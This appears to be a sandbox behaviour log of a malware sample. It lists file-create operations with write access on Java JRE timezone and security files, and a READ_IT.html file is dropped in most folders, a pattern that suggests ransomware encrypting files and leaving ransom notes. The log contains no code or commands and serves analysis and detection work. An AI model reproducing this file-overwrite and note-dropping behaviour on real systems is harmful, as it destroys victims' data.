Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Fortaleza	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Glace_Bay	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Godthab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Goose_Bay	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Grand_Turk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Guatemala	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Guayaquil	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Guyana	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Halifax	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Havana	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Hermosillo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Inuvik	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Iqaluit	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Jamaica	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Juneau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\La_Paz	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Lima	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Los_Angeles	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Maceio	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Managua	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Manaus	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Martinique	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Matamoros	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Mazatlan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Menominee	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Merida	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Metlakatla	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Mexico_City	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Miquelon	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Moncton	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Monterrey	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Montevideo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Montreal	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Nassau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\New_York	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Nipigon	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Nome	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Noronha	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Ojinaga	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Panama	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Pangnirtung	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Paramaribo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Phoenix	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Port-au-Prince	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Porto_Velho	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Port_of_Spain	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Puerto_Rico	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Rainy_River	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Rankin_Inlet	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Recife	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Regina	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Resolute	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Rio_Branco	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Santarem	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Santa_Isabel	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Santiago	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Santo_Domingo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Sao_Paulo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Scoresbysund	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Sitka	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\St_Johns	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Swift_Current	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Tegucigalpa	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Thule	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Thunder_Bay	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Tijuana	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Toronto	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Vancouver	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Whitehorse	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Winnipeg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Yakutat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Yellowknife	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\North_Dakota\Beulah	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\North_Dakota\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\North_Dakota\Center	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\North_Dakota\New_Salem	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Kentucky\Louisville	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Kentucky\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Kentucky\Monticello	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Indianapolis	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Knox	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Marengo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Petersburg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Tell_City	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Vevay	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Vincennes	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Indiana\Winamac	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Buenos_Aires	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Catamarca	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Cordoba	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Jujuy	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\La_Rioja	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Mendoza	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Salta	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\San_Juan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\San_Luis	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Tucuman	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\America\Argentina\Ushuaia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Abidjan	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Accra	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Addis_Ababa	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Algiers	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Asmara	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Bamako	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Bangui	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Banjul	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Bissau	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Blantyre	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Brazzaville	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Bujumbura	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Cairo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Casablanca	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Ceuta	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Conakry	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Dakar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Dar_es_Salaam	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Djibouti	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Douala	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\El_Aaiun	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Freetown	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Gaborone	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Harare	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Johannesburg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Kampala	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Khartoum	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Kigali	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Kinshasa	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Lagos	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Libreville	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Lome	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Luanda	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Lubumbashi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Lusaka	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Malabo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Maputo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Maseru	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Mbabane	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Mogadishu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Monrovia	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Nairobi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Ndjamena	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Niamey	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Nouakchott	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Ouagadougou	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Porto-Novo	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Sao_Tome	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Tripoli	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Tunis	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\zi\Africa\Windhoek	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\blacklist	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\cacerts	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\java.policy	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\java.security	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\javafx.policy	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
